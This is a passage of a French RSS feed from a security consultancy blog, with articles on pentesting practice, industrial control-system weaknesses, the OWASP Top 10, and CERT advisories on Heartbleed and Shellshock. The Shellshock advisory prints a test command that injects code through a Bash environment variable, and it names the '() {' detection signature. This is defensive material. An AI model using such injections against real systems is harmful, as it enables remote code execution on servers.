<p>Cet article <a href="https://www.riskinsight-wavestone.com/2016/03/test-de-grassmarlin-outil-open-source/">Test de Grassmarlin, outil open-source de cartographie passive pour SI industriels</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Le fardeau du pentesteur</title>
		<link>https://www.riskinsight-wavestone.com/2015/03/le-fardeau-du-pentesteur/</link>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Mon, 23 Mar 2015 13:41:45 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Deep-dive]]></category>
		<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[pentesteur]]></category>
		<category><![CDATA[test d'intrusion]]></category>
		<category><![CDATA[vulnérabilités]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=15499</guid>

					<description><![CDATA[<p>La sécurité informatique a fait du chemin ces dernières années. Désormais, toute entreprise de taille respectable dispose de sa politique de sécurité des systèmes d’information. Des sessions de sensibilisation des utilisateurs à la sécurité sont réalisées. Une gouvernance sécurité s’est...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/03/le-fardeau-du-pentesteur/">Le fardeau du pentesteur</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div style="margin: 0cm 0cm 10.0pt 0cm;">
<div class="visually-hidden" style="text-align: center;"><a style="margin-left: 1em; margin-right: 1em;" href="http://3.bp.blogspot.com/-NjLVhBfmbGA/VRBVoMyJu8I/AAAAAAAAAAs/8gCWgLP6Xf4/s1600/%C2%A9%2BAndrea%2BDanti%2B-%2BFotolia.com.jpg"><img loading="lazy" decoding="async" src="http://3.bp.blogspot.com/-NjLVhBfmbGA/VRBVoMyJu8I/AAAAAAAAAAs/8gCWgLP6Xf4/s1600/%C2%A9%2BAndrea%2BDanti%2B-%2BFotolia.com.jpg" width="320" height="240" border="0" /></a></div>
<p style="text-align: left;"><i><span style="color: #666666;"><span style="font-family: inherit;">La sécurité informatique a fait du chemin ces dernières années. Désormais, toute entreprise de taille respectable dispose de sa politique de sécurité des systèmes d’information. Des sessions de sensibilisation des utilisateurs à la sécurité sont réalisées. Une gouvernance sécurité s’est même mise en place : le RSSI pilote, définit des KPI, analyse ses tableaux de bords SSI. Mais la technique n’est pas non plus oubliée ; on sait désormais que rien ne vaut un test d’intrusion pour vérifier, en imitant les méchants hackers, le niveau de sécurité d’une application ou d’un SI. Et ils vécurent heureux et ne subirent aucune attaque ? Pas si sûr&#8230;</span></span></i></p>
</div>
<div style="margin: 0cm 0cm 10.0pt 0cm;">
<h2>Le test d’intrusion n’est pas une science exacte</h2>
</div>
<div>
<div class="MsoNormal"><span style="font-family: inherit;">Non, malheureusement, le test d’intrusion n’est pas une science exacte. C’est une démarche qui relève plus de la pratique que de la théorie. Et c’est tant mieux. Pourquoi ? Le test d’intrusion n’est pas un audit. L’objectif du test d’intrusion est d’avoir une vision réaliste, “terrain”, du niveau de sécurité d’une application, d’un environnement ou d’un système. Le pentesteur dispose alors d’informations limitées sur sa cible, et doit faire appel à ses connaissances et compétences pour essayer de comprendre les rouages de son fonctionnement, afin d’identifier les éventuelles vulnérabilités. C’est en cela qu’un test d’intrusion automatique est un non-sens ! L’automatisation ne permet pas cette compréhension fine du fonctionnement de la cible, et se contente de dérouler des scénarii de tests prédéfinis.</span></div>
<div class="MsoNormal"></div>
<div class="MsoNormal"><span style="font-family: inherit;">Par ailleurs, même si le pentesteur vise l’exhaustivité dans ses tests, les conditions de réalisation jouent souvent contre lui ! Le test a forcément une durée limitée, qui ne permet d’explorer qu’un nombre limité d’options. De plus, l’environnement sur lequel se déroulent les tests est rarement identique à 100% à l’environnement de production, que ce soit par des différences de configuration, des fonctionnalités non-disponibles, ou des comptes utilisateurs.</span></div>
<div class="MsoNormal"><b style="color: #00477f;"></b><br />
<b style="color: #00477f;"><span style="font-family: inherit;">Une première frustration pour le pentesteur : savoir que son travail, même dévoué, n’est jamais totalement complet.</span></b></div>
<h2>Des tests d’intrusion souvent mal exploités</h2>
</div>
<div><span style="font-family: inherit;">Les tests d’intrusion sont de plus en plus fréquemment gérés par “campagne”, mission d’une durée plus longue et qui regroupe plusieurs audits, réalisés souvent par le même prestataire. On peut ainsi assurer une certaine homogénéité dans les audits, profiter d’un contexte client mieux connu, et proposer des recommandations plus adaptées.</span><span style="font-family: inherit;"><br />
</span><br />
<span style="font-family: inherit;">Malheureusement, une fois cette information obtenue, il convient de traiter les risques (ou de les accepter, pourquoi pas&#8230;). Force est de constater que cette étape n’est pas la plus maîtrisée, dans la plupart des cas. Les campagnes d’audit menées de manière récurrente sur des périmètres comparables font souvent apparaître des rapports d’audit grandement similaires, voir identiques.</span><span style="font-family: inherit;"><br />
</span><br />
<span style="font-family: inherit;">Pourquoi cette situation ? Malheureusement, si les budgets SSI permettent les audits, ils sont rarement dimensionnés pour absorber le coût de la mise en œuvre des recommandations. De plus, les équipes projets sont bien trop souvent réfractaires aux changements, d’autant plus qu’ils sont à appliquer globalement (problématiques de contrôle d’accès, de filtrage des entrées,…).</span><br />
<span class="Miseenvaleur"><span style="font-family: inherit;"><br />
</span></span></p>
<div class="MsoNormal"><span class="Miseenvaleur"><span style="font-family: inherit;">Par ailleurs, au-delà des querelles sur la réelle nécessité d’implémenter tel ou tel mécanisme de sécurité (d’autant plus vigoureuse que l’application est “interne”), c’est très souvent l’implémentation des mécanismes de sécurité qui fait défaut. Les risques sont identifiés, des mesures de protection identifiées et validées, et pourtant, le jour du test d’intrusion, les illusions volent en éclat.</span></span></div>
</div>
<div></div>
<div></div>
<div></div>
<div>
<p>&nbsp;</p>
<div class="MsoNormal"><span class="Miseenvaleur"><span style="font-family: inherit;"><b style="font-family: inherit;"><span style="color: #00477f;"><span style="font-family: inherit;">C’est bien là le regret du pentesteur : découvrir que son travail n’a servi à rien; qu’un an plus tard, les vulnérabilités sont toujours présentes et que d’autres sont même venues s’ajouter.</span></span></b></span></span></div>
</div>
<div>
<h2></h2>
<h2>Quelles conclusions pour la réalisation de tests<br />
d’intrusion ?</h2>
</div>
<div><span style="font-family: inherit;">Faut-il stopper la réalisation de tests d’intrusion ? Non, sans doute pas. En revanche, il convient peut-être de modifier la manière dont on utilise ces ressources. </span><span class="Miseenvaleur"><span style="font-family: inherit;"><br />
</span></span></p>
<div class="MsoNormal"><span class="Miseenvaleur"><span style="font-family: inherit;">D’abord, il faut savoir choisir ses cibles : inutile de tester le même périmètre que l’an dernier tant que l’on n’a pas obtenu la confirmation que les recommandations existantes ont été appliquées !</span></span></div>
<div></div>
<div class="MsoNormal"><span class="Miseenvaleur"><span style="font-family: inherit;">Ensuite, il faut tenter de traiter le problème à la racine : il est inefficace d’empiler les recommandations sur les failles XSS tant que les développeurs ne savent pas correctement traiter les entrées utilisateurs ! Et pour cela, le pentesteur peut apporter plus qu’une liste de vulnérabilités à la Prévert. Il doit s’assurer de l’adhésion des équipes techniques aux recommandations, ainsi que de leur implémentation technique. Pour cela, la réalisation d’ateliers avec les équipes techniques, visant à identifier dans le détail l’implémentation des recommandations, est un vrai plus ! En </span></span><span class="Miseenvaleur"><span style="font-family: inherit;">complément de cet accompagnement sur la mise en œuvre de moyens de protection, les résultats du test d’intrusion doivent également permettre la fiabilisation des mécanismes de supervision sécurité. Pour cela, un travail main dans la main avec les équipes de supervision est nécessaire, ainsi qu’un bilan à froid des actions qui ont été menées, celles qui ont été détectées et celles ne l’ayant pas été. On initie ainsi un cercle vertueux d’amélioration de la détection au cours du temps, concentré sur des éléments « terrain ».</span></span></div>
<div></div>
<div class="MsoNormal"><span class="Miseenvaleur"><span style="font-family: inherit;">Cette collaboration plus étroite entre les équipes de sécurité et les pentesteurs est sans doute la clé pour un meilleur ROI sur les tests d’intrusion. On trouve des références à cette approche sous le nom de “purple team”, une référence aux notions de “blue team” (défense) et de “red team” (attaque) utilisée dans le domaine militaire.</span></span></div>
<div></div>
</div>
<div></div>
<div></div>
<div>
<p>&nbsp;</p>
<div><b style="color: #00477f; font-family: inherit;">Le salut du pentesteur pourrait donc résider dans </b><b style="color: #00477f; font-family: inherit;">cette approche : offrir plus qu’un rapport et des slides, et avoir une démarche </b><b style="color: #00477f; font-family: inherit;">plus intégrée pour, enfin, améliorer la sécurité.</b></div>
</div>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/03/le-fardeau-du-pentesteur/">Le fardeau du pentesteur</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Niveau de sécurité des SI Industriels : les vulnérabilités les plus courantes</title>
		<link>https://www.riskinsight-wavestone.com/2015/01/niveau-de-securite-des-si-industriels-les-vulnerabilites-les-plus-courantes/</link>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Fri, 16 Jan 2015 08:04:04 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[manuf & industry 4.0]]></category>
		<category><![CDATA[SI industriel]]></category>
		<category><![CDATA[vulnérabilités]]></category>
		<guid isPermaLink="false">http://www.solucom-insight.fr/?p=6896</guid>

					<description><![CDATA[<p>Le niveau de sécurité actuel des SI Industriels est souvent remis en question par les spécialistes en sécurité. Alors, cri au loup ou réalité encore méconnue ? Les audits et études réalisés par Solucom ne font que confirmer les défauts...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/01/niveau-de-securite-des-si-industriels-les-vulnerabilites-les-plus-courantes/">Niveau de sécurité des SI Industriels : les vulnérabilités les plus courantes</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Le niveau de sécurité actuel des SI Industriels est souvent remis en question par les spécialistes en sécurité. Alors, cri au loup ou réalité encore méconnue ? Les audits et études réalisés par Solucom ne font que confirmer les défauts de sécurité sur ces infrastructures.</p>
<h2>Une sécurisation insuffisante, voire inexistante</h2>
<p>Les automates programmables industriels (API), en charge de l’interface avec le monde physique, n’intègrent souvent que peu de fonctions de sécurité et les failles de sécurité publiques les concernant sont nombreuses. L’ICS-CERT a ainsi publié près d’une centaine de bulletins de vulnérabilités sur des composants industriels. Les protocoles de communication utilisés sont un des maillons faibles de la chaîne. Ces protocoles, parmi lesquels on peut citer Modbus, permettent l’échange de consignes ou de valeurs en clair, sans chiffrement.</p>
<p>De même, les possibilités d’authentification des actions sont souvent limitées, permettant à n’importe quel attaquant ayant accès au réseau de modifier les consignes des automates et ainsi d’influer sur leur comportement. Les interfaces d’administration des automates sont par ailleurs souvent protégées par des mots de passe par défaut, jamais changés, et qui parfois ne peuvent pas l’être. Les systèmes plus intégrés appelés SNCC (Systèmes Numériques de Contrôle-Commande) ne sont pas garants d’une sécurité accrue, les protocoles propriétaires utilisés n’apportant pas forcément une réelle couche de sécurité.</p>
<p>La situation est identique pour les PC de supervision ou de programmation qui sont souvent des équipements reposant sur des technologies standard, tels que des systèmes d’exploitation Microsoft Windows. Malheureusement, l’expérience sécurité acquise sur le SI de gestion pour ces équipements profite rarement à leur sécurisation sur la partie industrielle. Les étapes de durcissement sécurité sont rares, de même que l’application de correctifs de sécurité, ou encore la présence d’un antivirus. Il est fréquent de pouvoir prendre le contrôle de ces systèmes par l’exploitation d’une faille de sécurité datant de près de 6 ans.</p>
<h2>Un cloisonnement tout à fait relatif</h2>
<p>De plus, les équipements du SI Industriel sont très largement interfacés avec les SI de gestion. Le cloisonnement entre ces deux mondes est souvent permissif. Il arrive même que le filtrage autorise l’accès à certains équipements industriels depuis l’ensemble du réseau interne d’une entreprise, ce qui peut représenter plusieurs dizaines de milliers de machines.<br />
Les postes de programmation et clés USB constituent également des vecteurs d’attaques puisqu’ils sont connectés à des réseaux de niveau de sécurité hétérogène, voire à des environnements non-maîtrisés (par exemple dans le cas de sous-traitants).</p>
<p>Pire encore, il arrive trop souvent que des équipements industriels soient accessibles directement sur internet. Il existe même des moteurs de recherche dédiés à la recherche d’équipements exposés sur internet, Shodan étant le plus connu. Près de 1500 équipements Modbus sont ainsi recensés en France sur Shodan et plus de 20 000 dans le monde.</p>
<h2>Un constat d’échec ?</h2>
<p>Il ne s’agit néanmoins pas de se lamenter. Bien que le niveau de sécurité actuellement constaté soit faible, il est possible de mener des actions d’amélioration. Au-delà des concepts d’architecture qui permettent de cloisonner ces équipements vulnérables, la vraie, seule solution à long terme consiste à développer de nouveaux produits, sécurisés by design. Bien sûr, les fruits de ce travail ne se verront que sur les nouvelles installations, et pas avant plusieurs dizaines d’années. On peut espérer que la prise de conscience globale des parties prenantes, ainsi que l’implication des instances gouvernementales accélèrent ce changement.<br />
En attendant il semble aujourd’hui nécessaire de déporter les fonctions sécurité sur des équipements dédiés, comme des passerelles encapsulant le trafic réseau dans un tunnel chiffré, ou bien des pare-feu ou IPS disposant de modules spécifiques aux protocoles industriels.</p>
<p>Enfin, il faut également savoir tirer parti d’une des faiblesses des SI Industriels : leur durée de vie et la complexité de changements. En effet, la mise en place d’une supervision sécurité sera facilitée par le caractère figé des réseaux industriels : il est rare que de nouveaux équipements soient installés ou que la topologie réseau soit modifiée. De même, l’emploi d’une solution de contrôle d’exécution par liste blanche sera plus facile sur un PC industriel n’exécutant qu’un seul logiciel de supervision que sur un poste de travail bureautique.</p>
<figure id="post-6898 media-6898" class="align-none"><img loading="lazy" decoding="async" class="" src="http://www.solucom-insight.fr/wp-content/uploads/2015/01/Capture.jpg" alt="" width="508" height="246" /></figure>
<figure id="post-6898 media-6898" class="align-none"></figure>
<p><span style="font-size: x-small;">1 &#8211; http://www.rapid7.com/db/modules/auxiliary/scanner/scada/modbusclient </span><br />
<span style="font-size: x-small;">2 &#8211; https://github.com/arnaudsoullie/metasploit-framework/blob/modicon_stux_transfer/modules/auxiliary/admin/scada/modicon_stux_transfer.rb<br />
</span><span style="font-size: x-small;">3 &#8211; https://github.com/arnaudsoullie/scan7</span></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/01/niveau-de-securite-des-si-industriels-les-vulnerabilites-les-plus-courantes/">Niveau de sécurité des SI Industriels : les vulnérabilités les plus courantes</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Faille critique Shellshock : recommandations du CERT-Solucom</title>
		<link>https://www.riskinsight-wavestone.com/2014/09/faille-critique-shellshock-recommandations-du-cert-solucom/</link>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Thu, 25 Sep 2014 19:37:39 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[CERT]]></category>
		<category><![CDATA[incident response CERT-W]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=5801</guid>

					<description><![CDATA[<p>Article mis à jour le 26/09 Une vulnérabilité critique concernant l’interpréteur de commandes Bash a été publiée hier (CVE-2014-6271). Dans certaines conditions, cette vulnérabilité permet à un attaquant d’exécuter du code arbitraire. Le score CVSS indiquant la gravité de la...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/09/faille-critique-shellshock-recommandations-du-cert-solucom/">Faille critique Shellshock : recommandations du CERT-Solucom</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>Article mis à jour le 26/09</em></p>
<p>Une vulnérabilité critique concernant l’interpréteur de commandes Bash a été publiée hier (CVE-2014-6271). Dans certaines conditions, cette vulnérabilité permet à un attaquant d’exécuter du code arbitraire. Le score CVSS indiquant la gravité de la vulnérabilité est évalué à 10, la note maximale.</p>
<p>Cette vulnérabilité affecte les versions 1.14 à 4.3 de Bash et des <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=3505#p23987" target="_blank" rel="noopener noreferrer">attaques</a> sont en cours sur les services vulnérables.</p>
<p>Des correctifs de sécurité ont été publiés mais sont incomplets. Cette nouvelle vulnérabilité a été identifiée sous le numéro CVE-2014-7169.</p>
<h2>Quels systèmes sont impactés ?</h2>
<p>Les distributions Linux sont les principaux systèmes impactés par la vulnérabilité, car elles intègrent l’interpréteur de commande Bash par défaut. C’est également le cas de Mac OSX, et des utilisateurs de Cygwin sous Windows.</p>
<p>Cependant, de nombreux logiciels et services réalisent des appels système via Bash et sont par conséquent vulnérables.</p>
<p>Il est aujourd’hui confirmé que cette vulnérabilité peut s’exploiter à distance dans certains cas :</p>
<ul>
<li>Sur un serveur web pouvant faire appel à Bash (scripts cgi, appels systèmes Python ou PHP).</li>
<li>Sur un serveur SSH (uniquement après authentification).</li>
<li>Sur un service <a href="https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/" target="_blank" rel="noopener noreferrer">DHCP</a>.</li>
</ul>
<p>Plus généralement tout autre service pouvant faire appel à Bash pourrait être affecté.</p>
<p>Cette faille peut notamment être <a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb" target="_blank" rel="noopener noreferrer">exploitée</a> afin de réaliser une élévation de privilège sous Mac OSX, qui intègre également Bash par défaut.</p>
<h2>Comment vérifier si je suis vulnérable ?</h2>
<p>Il est possible d’identifier la vulnérabilité via l’exécution de la commande suivante :</p>
<p><span style="background-color: #c0c0c0;">$ env var='() { ignore this:;}; echo vulnerable&rsquo; bash -c /bin/true</span></p>
<p>Dans le cas d’un serveur vulnérable, la commande affichera « vulnerable ».</p>
<p><i>Attention : cette commande permet de vérifier la bonne application des correctifs disponibles. Cependant, il semblerait que ces correctifs ne mitigent pas l’ensemble des attaques possibles, en particulier l’exploitation locale.</i></p>
<h2 align="left">Quelles sont les actions à mener ?</h2>
<h4 align="left">1-  Recenser les produits vulnérables</h4>
<p align="left">La plupart des systèmes d’exploitation Linux, ainsi que Mac OS X sont affectées par cette vulnérabilité.</p>
<p align="left">Cependant, cette vulnérabilité pourrait également être présente sur d’autres équipements se basant sur des systèmes UNIX. On pense notamment aux <em>appliances</em> réseau et de sécurité, ainsi qu’aux systèmes embarqués.</p>
<p align="left">Il convient de se référer aux bulletins publiés par les éditeurs, lorsqu’ils sont disponibles,  pour plus d’informations.</p>
<h4 align="left">2- Appliquer les correctifs de sécurité</h4>
<p>Bien que son efficacité soit partiellement remise en cause, le correctif de sécurité publié pour Bash permettra de se prémunir des attaques distantes les plus communes.</p>
<h4 align="left">3- Détecter les attaques</h4>
<p>Afin de compléter les mécanismes de protection mis en place, il est possible de détecter ou de bloquer les attaques les plus simples via l’utilisation d’équipements de type IDS/IPS.</p>
<p>Certains éditeurs proposent actuellement des signatures spécifiques à cette attaque, qui reposent sur la détection des caractères spéciaux “() {” dans les en-têtes des requêtes http.</p>
<p>Il est également recommandé d’analyser les logs existants pour détecter une exploitation passée de ShellShock.</p>
<p>&nbsp;</p>
<p align="left">Ce bulletin sera complété dans les prochains jours. Pour plus de précisions, vous pouvez contacter le<a href="mailto:cert@solucom.fr" target="_blank" rel="noopener noreferrer"> CERT-SOLUCOM</a></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/09/faille-critique-shellshock-recommandations-du-cert-solucom/">Faille critique Shellshock : recommandations du CERT-Solucom</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Faille critique Heartbleed : recommandations du CERT-Solucom</title>
		<link>https://www.riskinsight-wavestone.com/2014/04/faille-critique-heartbleed-recommandations-du-cert-solucom/</link>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Wed, 09 Apr 2014 15:22:31 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[incident response CERT-W]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=5320</guid>

					<description><![CDATA[<p>[Cet article sera mis à jour régulièrement] Une faille de sécurité critique Heartbleed a été identifiée dans les bibliothèques OpenSSL. Elle permet à un attaquant externe, non authentifié, de récupérer le contenu de la mémoire du serveur. Les tests que...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/04/faille-critique-heartbleed-recommandations-du-cert-solucom/">Faille critique Heartbleed : recommandations du CERT-Solucom</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>[Cet article sera mis à jour régulièrement]</p>
<p>Une faille de sécurité critique <a href=" http://heartbleed.com/" target="_blank" rel="noopener noreferrer">Heartbleed</a> a été identifiée dans les bibliothèques OpenSSL. Elle permet à un attaquant externe, non authentifié, de récupérer le contenu de la mémoire du serveur.</p>
<p>Les tests que nous avons menés ont montré qu’il était possible de récupérer les données échangées avec le serveur (dont les <em>logins</em> / mots de passe des utilisateurs), ainsi que des fichiers de configuration.</p>
<p><span style="text-decoration: underline;">Recommandations</span></p>
<p>1- Nous recommandons dans un premier  temps de réaliser un inventaire des équipements utilisant ces bibliothèques, et de procéder à un test de vulnérabilité : soit par l’analyse de la version installée , soit via l’utilisation d’un script ;</p>
<p>2- Ensuite, d’appliquer les correctifs de sécurité ;</p>
<p>3- Il est également recommandé de considérer comme compromises les informations ayant transité par ces équipements, et de forcer un renouvellement des mots de passe (utilisateurs, serveurs, etc) ;</p>
<p>4- La clé privée du serveur pouvant également être impactée, il est recommandé de considérer la révocation et le renouvellement des certificats concernés, à minima sur les systèmes sensibles.</p>
<p><span style="text-decoration: underline;">Produits concernés</span></p>
<ul>
<li> OpenSSL 1.0.1 à 1.0.1f et OpenSSL 1.0.2-beta</li>
</ul>
<ul>
<li> Les branches 0.9.8 et 1.0.0 ne sont pas vulnérables</li>
</ul>
<p><b>Attention, de nombreuses solutions packagées et appliances reposent sur ces bibliothèques et sont vulnérables : reverse proxy, passerelle VPN, etc.</b></p>
<p>Cet article sera complété dans les prochaines heures ; pour plus de précisions, vous pouvez contacter le <a title="HeartBleed" href="mailto:cert@solucom.fr" target="_blank" rel="noopener noreferrer">CERT-Solucom</a>.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/04/faille-critique-heartbleed-recommandations-du-cert-solucom/">Faille critique Heartbleed : recommandations du CERT-Solucom</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>SecApp : que retenir du nouveau TOP 10 de l’OWASP ?</title>
		<link>https://www.riskinsight-wavestone.com/2013/07/secapp-que-retenir-du-nouveau-top-10-de-lowasp/</link>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Wed, 03 Jul 2013 14:05:26 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[applicatif]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[SecApp]]></category>
		<category><![CDATA[vulnérabilités]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=3885</guid>

					<description><![CDATA[<p>L’OWASP (Open Web Application Security Project) vient de publier une version mise à jour de son Top 10. Très largement reconnu et souvent utilisé comme référence, le TOP 10 de l’OWASP recense les dix familles de vulnérabilités les plus répandues...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/07/secapp-que-retenir-du-nouveau-top-10-de-lowasp/">SecApp : que retenir du nouveau TOP 10 de l’OWASP ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>L’<a href="https://www.owasp.org" target="_blank" rel="noopener noreferrer">OWASP</a> (<em>Open Web Application Security Project</em>) vient de publier une version mise à jour de son Top 10. Très largement reconnu et souvent utilisé comme référence, <a href="https://www.owasp.org/index.php/Top_10_2013-Top_10" target="_blank" rel="noopener noreferrer">le TOP 10 de l’OWASP</a> recense les dix familles de vulnérabilités les plus répandues et les plus critiques.</p>
<h2> Le Top 10 2013, dans la continuité des Top 10 précédents</h2>
<p>La quasi-totalité des risques présents dans le top 10 2010 le sont encore dans le top 10 2013. De même, aucun réel nouveau risque n’est apparu : il ne s’agit que d’un remaniement.</p>
<p><a href="http://www.solucominsight.fr/2013/07/secapp-que-retenir-du-nouveau-top-10-de-lowasp/top-10-owasp-2/" rel="attachment wp-att-3911"><img loading="lazy" decoding="async" class="alignnone  wp-image-3911" title="Top 10 OWASP" src="http://www.solucominsight.fr/wp-content/uploads/2013/07/Top-10-OWASP1.jpg" alt="" width="703" height="235" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2013/07/Top-10-OWASP1.jpg 1041w, https://www.riskinsight-wavestone.com/wp-content/uploads/2013/07/Top-10-OWASP1-437x147.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2013/07/Top-10-OWASP1-71x24.jpg 71w" sizes="auto, (max-width: 703px) 100vw, 703px" /></a></p>
<p><em> Evolutions du Top 10 entre 2010 et 2013</em></p>
<p>Cette mise à jour reflète néanmoins les évolutions constatées lors de nos audits, et notamment le recours de plus en plus fréquent à des framework de développement, mais dont les fonctionnalités de sécurité ne sont pas forcément (bien) utilisées ; ainsi, les failles applicatives sont souvent détectées dans les modules développés spécifiquement pour les besoins métiers. Par ailleurs, le trio de tête « Injection, XSS et gestion des sessions » reste présent dans la quasi-totalité des applications que nous auditons.</p>
<h2>Quelques évolutions marquantes du Top10 2013</h2>
<h4> Falsification de requête intersites (CSRF)</h4>
<p>De plus en plus, des fonctions de protection contre le CSRF sont intégrées dans les framework de développement ainsi que dans les logiciels commerciaux, ce qui explique la diminution du risque associé. Cependant, ne prenons pas pour acquis cette protection : nous constatons très fréquemment des vulnérabilités de ce type, qui restent moins connues des développeurs que les vulnérabilités d’injection.</p>
<h4> Manque de contrôle d’accès au niveau fonctionnel</h4>
<p>Les vulnérabilités de contrôle d’accès remontent dans le classement, non pas parce qu’elles sont plus fréquentes, mais parce qu’elles sont mieux détectées. Il s’agit effectivement de vulnérabilités que l’on retrouve très classiquement de nos audits. De plus, ces vulnérabilités sont souvent très difficiles, voire impossible à détecter à l’aide d’outils automatisés, car elles nécessitent une bonne compréhension du fonctionnement de l’application et de la logique métier : seul un auditeur humain saura comprendre et évaluer en détails ces mécanismes.</p>
<h4>Utilisation de composants avec des vulnérabilités connues</h4>
<p>Le recours à des frameworks de développement, ou plus simplement à des librairies externes, est de plus en plus fréquent. Cependant, les processus associés de veille sécurité et de mise à niveau régulière ne sont que rarement mis en place ; ainsi, nombreuses sont les applications à utiliser des composants pour lesquels des vulnérabilités sont connues, et exploitables.  De plus, les modifications apportées à certaines applications peuvent empêcher l’application des correctifs de sécurité ou la migration vers des versions nouvelles. Il est donc primordial d’assurer un suivi de l’ensemble des briques applicatives utilisées, comme suggéré par <a href="http://www.ssi.gouv.fr/IMG/pdf/guide_hygiene_informatique_anssi.pdf">la règle d’hygiène</a> n°6 de l’<a href="http://www.ssi.gouv.fr">ANSSI</a>.</p>
<h2> La sécurité applicative, un domaine que l’on ne peut plus ignorer</h2>
<p>Malheureusement, il est très rare d’auditer une application web dont le niveau de sécurité est satisfaisant. L’évolution du niveau de sécurité reste lente, notamment au regard d’une forte tendance à la hausse des intrusions et défacements. Pourtant, l’intégration de la sécurité dans les projets, ainsi que la création de <a href="http://www.solucominsight.fr/2013/03/secapp-la-securite-de-votre-si-passera-pas-la-securite-applicative/">cellules de sécurité applicative</a> sont des initiatives qui fonctionnent !</p>
<p>Alors, que faire ? Ne vous arrêtez pas à 10 ! Ce Top 10 n’a pas pour vocation de lister l’ensemble des vulnérabilités possibles et imaginables sur les applications web ! Il est primordial de savoir ajuster les mesures de sécurité aux besoins de sécurité propres à votre métier et à vos données, notamment par la réalisation d’une analyse de risques préalable.<br />
<em> </em></p>
<p><em>Le Top 10 vient également d’être traduit en français par le chapitre français de l’OWASP, projet auquel Solucom a eu le plaisir de participer. La version française est <a href=" http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20French.pdf">disponible sous ce lien.  </a></em></p>
<p><em> Pour être informé des prochains événements organisés par l’OWASP France, n’hésitez pas à rejoindre la </em><a href="https://lists.owasp.org/mailman/listinfo/owasp-france"><em>mailing-list OWASP France</em></a><em>.</em></p>
<p><em> </em>Pour en savoir plus sur les cellules de sécurité applicative (SecApp), n’hésitez pas à télécharger notre <a href="http://www.solucom.fr/Publications/La-cellule-SecApp-enfin-un-levier-pour-garantir-le-succes-de-la-securite-applicative">focus sur le sujet</a>.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/07/secapp-que-retenir-du-nouveau-top-10-de-lowasp/">SecApp : que retenir du nouveau TOP 10 de l’OWASP ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>HTTP Strict Transport Policy, une avancée dans la sécurisation des échanges sur Internet ?</title>
		<link>https://www.riskinsight-wavestone.com/2013/02/http-strict-transport-policy-une-avancee-dans-la-securisation-des-echanges-sur-internet/</link>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Thu, 21 Feb 2013 15:50:57 +0000</pubDate>
